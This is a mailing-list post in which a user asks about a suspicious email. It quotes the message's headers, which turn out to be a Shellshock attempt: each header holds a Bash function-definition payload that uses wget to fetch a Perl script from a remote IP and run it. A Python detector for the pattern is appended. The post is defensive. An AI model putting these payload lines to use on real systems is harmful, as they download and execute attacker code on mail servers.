First, I apologize for this not being fedora-specific, but I just got
the oddest email. It looks like an intrusion attempt, trying to get
sendmail to execute a perl script. Is anybody familiar with this
particular pattern?
The email is below.
Thanks,
billo
Return-Path: <MAILER-DAEMON(a)billoblog.com>
Received: from incenclick.com (incenclick.com [184.95.45.61] (may be forged))
        by hope.billoblog.com (8.14.4/8.14.4) with SMTP id s96FKVOY029890
        for <nobody>; Mon, 6 Oct 2014 15:20:31 GMT
Resent-Message-Id: <201410061520.s96FKVOY029890(a)hope.billoblog.com>
X-Authentication-Warning: hope.billoblog.com: incenclick.com [184.95.45.61] (may be forged) didn't use HELO protocol
To:() { :;;};wget.http://91.207.254.60/.../bb.-O/tmp/bb;perl/tmp/bb@hope.billoblog.com;;
References:() { :; };wget http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb
Cc:() { :;;};wget.http://91.207.254.60/.../bb.-O/tmp/bb;perl/tmp/bb@hope.billoblog.com;;
From:() { :;;};wget.http://91.207.254.60/.../bb.-O/tmp/bb;perl/tmp/bb@billoblog.com;;
Subject:() { :; };wget http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb
Date:() { :; };wget http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb
Message-ID:() { :; };wget http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb
Comments:() { :; };wget http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb
Keywords:() { :; };wget http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb
Resent-Date:() { :; };wget http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb
Resent-From:() { :;;};wget.http://91.207.254.60/.../bb.-O/tmp/bb;perl/tmp/bb@billoblog.com;;
Resent-Sender:() { :;;};wget.http://91.207.254.60/.../bb.-O/tmp/bb;perl/tmp/bb@billoblog.com;;
wget http://91.207.254.60/.../bb -O /tmp/bb; perl /tmp/bb
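
A header check for the pattern in the message above, added here as an example and not part of the original post: Bash treats an environment value that begins with `() {` as a function definition, so the check flags any header whose unfolded value starts that way. The sample message, its host names and `placeholder-command` are constructed, and the function name `suspicious_headers` is hypothetical.

```python
import re
from email import message_from_string
from email.policy import compat32

# A value starting with "() {" is what Bash parses as an exported function
# definition; tolerate optional whitespace between the tokens.
FUNC_PREFIX = re.compile(r"^\s*\(\s*\)\s*\{")

# Constructed sample: header layout modelled on the message above, with the
# command replaced by a harmless placeholder and documentation-only hosts.
SAMPLE = (
    "Return-Path: <MAILER-DAEMON@mail.example>\n"
    "Received: from relay.example (relay.example [192.0.2.10])\n"
    "\tby mail.example with SMTP id PLACEHOLDER\n"
    "To:() { :;;};placeholder-command@mail.example;;\n"
    "Subject:() { :; };\n"
    " placeholder-command\n"
    "Date: Mon, 6 Oct 2014 15:20:31 GMT\n"
    "\n"
    "body\n"
)


def suspicious_headers(raw):
    """Return [(name, unfolded value)] for headers whose value starts with '() {'."""
    # compat32 keeps header values as raw strings, including folded lines.
    msg = message_from_string(raw, policy=compat32)
    hits = []
    for name, value in msg.items():
        # Unfold continuation lines so a payload split across lines still matches.
        unfolded = re.sub(r"\r?\n[ \t]+", " ", str(value)).strip()
        if FUNC_PREFIX.match(unfolded):
            hits.append((name, unfolded))
    return hits


if __name__ == "__main__":
    for name, value in suspicious_headers(SAMPLE):
        print(f"suspicious header {name}: {value!r}")
```

A hit only shows that the sender tried the pattern; whether it had any effect depends on whether a header value ever reaches an unpatched Bash through the environment, for example via a delivery agent or filter script.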